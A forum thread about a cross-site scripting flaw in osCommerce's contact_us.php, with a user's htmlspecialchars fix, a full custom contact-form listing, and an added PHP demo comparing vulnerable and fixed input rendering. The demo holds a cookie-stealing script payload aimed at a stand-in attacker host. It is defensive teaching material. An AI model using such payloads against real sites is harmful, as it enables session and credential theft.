
Cross Site Scripting in contact_us.php



I received this security alert this morning, but do not see a fix on the oscommerce.com web site, nor any mention in the forums here. Forgive me if I posted to the wrong place. Here are the details of the issue, as I received them:

 

Platform: Web Application

Title: osCommerce contact_us.php Cross-Site Scripting

Description: osCommerce is reported vulnerable to a cross-site scripting issue. Attackers could leverage this towards theft of cookie-based authentication credentials. osCommerce version 2.2-MS2 is reported vulnerable.

Ref: http://www.securityfocus.com/archive/1/390540

 

By following the link, you may view an example of the vulnerability being exposed on your own web site.

 

I fixed my installation by editing includes/functions/html_output.php

 

At line 222 change:

 

$field .= stripslashes($GLOBALS[$name]);

 

to

 

$field .= stripslashes(htmlspecialchars($GLOBALS[$name]));

 

Save and test. This eliminates the problem on my system.

 

That field is populated by a POST request, but the string was sent via GET, so there should be some kind of restriction that says the input can only come from the POST method. Instead, the GET data is found and inserted.

 

I don't know what this will break in other areas of the program, but I don't really think any of the input boxes should display HTML anyway. Correct me if there is a better way, please.

 

 

Silver.

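To make the mechanism in Silver's post concrete, here is an added example that is not osCommerce's code and not part of the original post. It reproduces the reflection (a value that arrived by GET is reinserted, unencoded, into the value="..." attribute of the POST form's input) and contrasts it with the hardened version, covering both the htmlspecialchars() change and the "POST only" restriction asked about above. The real reinsertion logic lives in tep_draw_input_field() in includes/functions/html_output.php; the function names build_request_globals, draw_input_vulnerable, draw_input_fixed and breaks_out_of_attribute, the sample request arrays and the attacker.example host are assumptions made for this demo, and the register_globals merge is emulated with an ordinary array so the script runs on any PHP version.

```php
<?php
// Added example (not osCommerce code): minimal reproduction of the
// contact_us.php reflection and its fix. Names below that are not
// osCommerce's (build_request_globals, draw_input_vulnerable,
// draw_input_fixed, breaks_out_of_attribute, the *_SAMPLE arrays and
// the attacker.example host) are assumptions for this demo.

// Constructed sample request: the form POSTs 'name', but the attacker puts
// the same parameter name in the query string of a link the victim clicks.
$GET_SAMPLE  = array(
    'action' => 'send',
    'name'   => '"><script>document.location="http://attacker.example/?c="+document.cookie</script>',
);
$POST_SAMPLE = array('name' => 'Alice', 'email' => 'alice@example.com');

// With register_globals=On (which osCommerce 2.2 required), every GET, POST
// and COOKIE key becomes a global variable, so $GLOBALS['name'] is set no
// matter which method carried it. Emulate that merge here; as with PHP's
// variables_order, a later source overrides an earlier one.
function build_request_globals(array $get, array $post) {
    return array_merge($get, $post);
}

// Vulnerable form, mirroring the pre-fix line 222 of html_output.php:
// the reinserted value goes into the attribute without any encoding.
function draw_input_vulnerable($name, array $globals) {
    $field = '<input type="text" name="' . $name . '"';
    if (isset($globals[$name])) {
        $field .= ' value="' . stripslashes($globals[$name]) . '"';
    }
    return $field . '>';
}

// Hardened form: (1) encode with ENT_QUOTES so neither " nor ' can close
// the attribute, and (2) only reinsert values that arrived by POST, which
// is how this form submits. (2) is the restriction Silver asks about.
function draw_input_fixed($name, array $post) {
    $field = '<input type="text" name="' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '"';
    if (isset($post[$name])) {
        $field .= ' value="' . htmlspecialchars(stripslashes($post[$name]), ENT_QUOTES, 'UTF-8') . '"';
    }
    return $field . '>';
}

// Check: does the rendered field contain a tag the input should never have
// been able to create? A correctly encoded value cannot contain a literal '<'.
function breaks_out_of_attribute($html) {
    return preg_match('/<script/i', $html) === 1;
}

// Case 1: the payload arrives only by GET. The vulnerable version reflects
// it into the page; the fixed version renders an empty field because
// nothing was POSTed.
$globals = build_request_globals($GET_SAMPLE, array());
$vuln    = draw_input_vulnerable('name', $globals);
$fixed   = draw_input_fixed('name', array());
echo $vuln, "\n", $fixed, "\n";
var_dump(breaks_out_of_attribute($vuln));
var_dump(breaks_out_of_attribute($fixed));

// Case 2: the same payload is POSTed directly (e.g. the form is redisplayed
// with the submitted values after a validation error). Source restriction
// alone does nothing here; the encoding is what keeps the value inert.
$fixed_post = draw_input_fixed('name', array('name' => $GET_SAMPLE['name']));
echo $fixed_post, "\n";
var_dump(breaks_out_of_attribute($fixed_post));

// Case 3: a legitimate POST still round-trips into the field as expected.
echo draw_input_fixed('name', $POST_SAMPLE), "\n";
```

Run it from the command line with php. The encoding is the part that matters: limiting reinsertion to POST closes the link-based attack in the advisory, but the same field is redisplayed with POSTed values after a validation error, so an unencoded value can still be reflected through a forged form submission. htmlspecialchars() without ENT_QUOTES leaves single quotes alone, which is adequate for osCommerce's double-quoted value attributes but not for single-quoted ones. Calling stripslashes() before or after the encoding gives the same result, since htmlspecialchars() neither consumes nor emits backslashes.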


Does anyone know if this will cause any problems with the site? Does it fix the Cross-Site Scripting problem?

 

Thanks!

Most Valuable OsCommerce Contributions:

Also Purchased (AP) Preselection (cuts this resource hogging query down to nothing) -- Contribution 3294

FedEx Automated Labels -- Contribution 2244

RMA Returns system -- Contribution 1136

Sort Products By Dropdown -- Contribution 4312

Ultimate SEO URLs -- Contribution 2823

Credit Class & Gift Voucher -- Contribution 282

Cross-Sell -- Contribution 5347


Yesudo made a fix - check the contributions.

 

I cannot seem to find anything in the contributions. What is the contribution called?

 

Thanks!


That fix causes my form not to work, as I have the Contact Us Choice contact form. Can you suggest a fix for it, or is none needed? Here is my contact_us.php:

 

<?php
/*
 $Id: contact_us.php,v 1.42 2003/06/12 12:17:07 hpdl Exp $

Revised as Contact Us Choice v1.0 by Fritz Clapp
+++ with these enhancements: ++++++++++++++++++++++++++++++++
- store address & phone from configuration is displayed
- an optional link may be used to show a map to the store
- additional text may be added under the store address & phone
- choice of multiple email destinations (if configured)
- name and email address of logged on customer is filled in
- subject of sent email distinguishes customer from guest
- preamble added to message with sender IP address
- requires entry of name (>3 chars) if guest
- checks that message body has some text
- uses new button_send.gif if it exists, instead of continue
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 for more info, refer to the contribution announcement and
 support threads at www.oscommerce.com/forums
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2004 osCommerce

 Released under the GNU General Public License
*/

 require('includes/application_top.php');

 require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_CONTACT_US);

  $error = false;
  if (isset($HTTP_GET_VARS['action']) && ($HTTP_GET_VARS['action'] == 'send')) {
    $name = tep_db_prepare_input($HTTP_POST_VARS['name']);
    $email_address = tep_db_prepare_input($HTTP_POST_VARS['email']);
    $enquiry = tep_db_prepare_input($HTTP_POST_VARS['enquiry']);
    $sender_type = tep_db_prepare_input($HTTP_POST_VARS['sendertype']);
    // index into CONTACT_US_LIST chosen by the radio/pull-down; read it from
    // POST explicitly instead of relying on register_globals to define $send_to
    $send_to = isset($HTTP_POST_VARS['send_to']) ? (int)$HTTP_POST_VARS['send_to'] : 0;

    if (strlen($name) < 3) {
      $error = true;
      $messageStack->add('contact', ENTRY_NAME_CHECK_ERROR);
    }
    if (!tep_validate_email($email_address)) {
      $error = true;
      $messageStack->add('contact', ENTRY_EMAIL_ADDRESS_CHECK_ERROR);
    }
    if ($enquiry == '') {
      $error = true;
      $messageStack->add('contact', ENTRY_ENQUIRY_CHECK_ERROR);
    }
    if ($error == false) {
      // add IP address and preamble text to message body
      $enquiry = sprintf(EMAIL_PREAMBLE_TEXT, $sender_type) . " " . tep_get_ip_address() . "\n-----------------------\n" . $enquiry;
      // use list of contact addresses if configured
      if (defined('CONTACT_US_LIST') && (CONTACT_US_LIST != '')) {
        $send_to_array = explode(",", CONTACT_US_LIST);
        // fall back to the first entry if the submitted index is out of range
        if (!isset($send_to_array[$send_to])) $send_to = 0;
        preg_match('/\<[^>]+\>/', $send_to_array[$send_to], $send_email_array);
        $send_to_email = eregi_replace(">", "", $send_email_array[0]);
        $send_to_email = eregi_replace("<", "", $send_to_email);
        // append sender type to subject line
        tep_mail(preg_replace('/\<[^*]*/', '', $send_to_array[$send_to]), $send_to_email, $sender_type . " " . EMAIL_SUBJECT, $enquiry, $name, $email_address);
      } else {
        tep_mail(STORE_OWNER, STORE_OWNER_EMAIL_ADDRESS, $sender_type . " " . EMAIL_SUBJECT, $enquiry, $name, $email_address);
      }
      tep_redirect(tep_href_link(FILENAME_CONTACT_US, 'action=success'));
    }
  }

 $breadcrumb->add(NAVBAR_TITLE, tep_href_link(FILENAME_CONTACT_US));
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>">
<title><?php echo TITLE; ?></title>
<base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

<!-- body //-->
<table class="mainTable" width="100%" cellspacing="0" cellpadding="0">
   <tr>
   <td class="mainTableLeft" width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="0">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>
<!-- left_navigation_eof //-->
   </table></td>
<!-- body_text //-->
   <td width="634" valign="top" class="prodTableRight"><?php echo tep_draw_form('contact_us', tep_href_link(FILENAME_CONTACT_US, 'action=send')); ?><center><table border="0" width="615" cellspacing="0" cellpadding="0">
     <tr>
       <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
         <tr>
           <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
           <td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_contact_us.gif', HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
         </tr>
       </table></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
<?php
 if ($messageStack->size('contact') > 0) {
?>
     <tr>
       <td><?php echo $messageStack->output('contact'); ?></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
<?php
 }

 if (isset($HTTP_GET_VARS['action']) && ($HTTP_GET_VARS['action'] == 'success')) {
?>
     <tr>
       <td class="main" align="center"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_man_on_board.gif', HEADING_TITLE,'0','0', 'align="left"') . TEXT_SUCCESS; ?></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
     <tr>
       <td><table border="0" width="100%" cellspacing="1" cellpadding="2" class="infoBox">
         <tr class="infoBoxContents">
           <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
             <tr>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
               <td align="right"><?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT) . '">' . tep_image_button('button_continue.gif', IMAGE_BUTTON_CONTINUE) . '</a>'; ?></td>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
             </tr>
           </table></td>
         </tr>
       </table></td>
     </tr>
<?php
 } else {
?>
          <tr>
              <td class="fieldValue" colspan="2"><?php echo HEADING_SUB_TITLE; ?><br><br></td>
         </tr>
     <tr>
      <td><table border="0" cellspacing="1" cellpadding="4" class="infoBox" width="100%"><tr class="infoBoxContents">
        <td class="main" valign="top" align="left" width="135">
       <b>Mailing Address:</b><br>
       <?php
       echo nl2br(STORE_NAME_ADDRESS);
       if (CONTACT_MAP_LINK != '') {
         echo '<br><br><a href="' . tep_href_link(FILENAME_REDIRECT, 'action=url&goto=' . urlencode(eregi_replace('http://', '', CONTACT_MAP_LINK)), 'NONSSL', false, false) . '" target="_blank">' . tep_image_button('button_map.gif', IMAGE_BUTTON_MAP) . '</a>';
       }
       if (CONTACT_US_ADDL_TEXT != '') {
         echo '<p align="' . ((CONTACT_US_ADDL_TEXT_ALIGN == '') ? 'center' : CONTACT_US_ADDL_TEXT_ALIGN) . '">' . CONTACT_US_ADDL_TEXT . '</p>';
       }
       ?>
       </td>
   <td align="right">
   <table border="0" width="100%" cellspacing="1" cellpadding="2">
         <tr>
           <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <?php
    if ((defined('CONTACT_US_LIST')) && (CONTACT_US_LIST != '')) {
      echo '<tr><td class="main">' . SEND_TO_TEXT . '</td></tr>'
         . '<tr><td class="main">';
      if (SEND_TO_TYPE == 'radio') {
        foreach (explode(",", CONTACT_US_LIST) as $k => $v) {
          $checked = ($k == 0);
          echo tep_draw_radio_field('send_to', "$k", $checked) . " " . preg_replace('/\<[^*]*/', '', $v) . "<br>\n";
        }
      } else {
        foreach (explode(",", CONTACT_US_LIST) as $k => $v) {
          $send_to_array[] = array('id' => $k, 'text' => preg_replace('/\<[^*]*/', '', $v));
        }
        echo tep_draw_pull_down_menu('send_to', $send_to_array);
      }
      echo "\n</td></tr>\n";
    }
    ?>
    <tr>
               <td class="main"><?php echo ENTRY_NAME; ?></td>
             </tr>
             <tr>
               <td class="main"><?php
    // prefill first+last name and email address if customer is logged in
    if (tep_session_is_registered('customer_id')) {
      $customer_query_raw = "select customers_firstname, customers_lastname, customers_email_address from " . TABLE_CUSTOMERS . " where customers_id='" . $customer_id . "'";
      $customer_query = tep_db_query($customer_query_raw);
      $customer_array = tep_db_fetch_array($customer_query);
      echo tep_draw_input_field('name', $customer_array['customers_firstname'] . " " . $customer_array['customers_lastname'], 'readonly');
      echo "</td></tr><tr><td class=\"main\">" . ENTRY_EMAIL . "</td></tr><tr><td class=\"main\">";
      echo tep_draw_input_field('email', $customer_array['customers_email_address'], 'readonly');
    } else {
      echo tep_draw_input_field('name');
      echo "</td></tr><tr><td class=\"main\">" . ENTRY_EMAIL . "</td></tr><tr><td class=\"main\">";
      echo tep_draw_input_field('email');
    } ?></td>
             </tr>
             <tr>
               <td class="main"><?php echo ENTRY_ENQUIRY; ?></td>
             </tr>
             <tr>
               <td><?php echo tep_draw_textarea_field('enquiry', 'soft', 50, 15); ?></td>
             </tr>
           </table></td></tr></table></td>
         </tr>
       </table></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
     <tr>
       <td><table border="0" width="100%" cellspacing="1" cellpadding="2" class="infoBox">
         <tr class="infoBoxContents">
           <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
             <tr>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
               <td align="right"><?php
      // identify sender as customer or guest
   echo tep_draw_hidden_field('sendertype',  tep_session_is_registered('customer_id') ? TEXT_CUSTOMER : TEXT_GUEST);
   echo tep_image_submit(file_exists(DIR_WS_LANGUAGES . $language . '/images/buttons/button_send.gif')?'button_send.gif':'button_continue.gif', IMAGE_BUTTON_SEND); ?></td>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
             </tr>
           </table></td>
         </tr>
       </table></td>
     </tr>
<?php
 }
?>
   </table></form></td>
<!-- body_text_eof //-->
    </table></td>
 </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

 

Thanks!!

